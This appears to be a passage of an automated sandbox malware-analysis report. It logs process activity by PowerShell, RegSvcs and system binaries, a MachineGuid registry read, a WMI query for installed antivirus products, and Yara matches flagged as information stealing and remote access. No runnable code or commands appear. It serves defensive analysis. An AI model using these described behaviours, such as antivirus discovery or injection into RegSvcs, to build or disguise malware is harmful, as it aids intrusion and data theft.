Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0.2.powershell.exe.1ee5f4509a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1ee60275c50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.2c02294.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2246251774.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715523883.000001EE5F4AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5828, type: MEMORYSTR
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\Documents Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: 0.2.powershell.exe.1ee5f4509a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1ee60275c50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.2c02294.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2246251774.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715523883.000001EE5F4AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5828, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs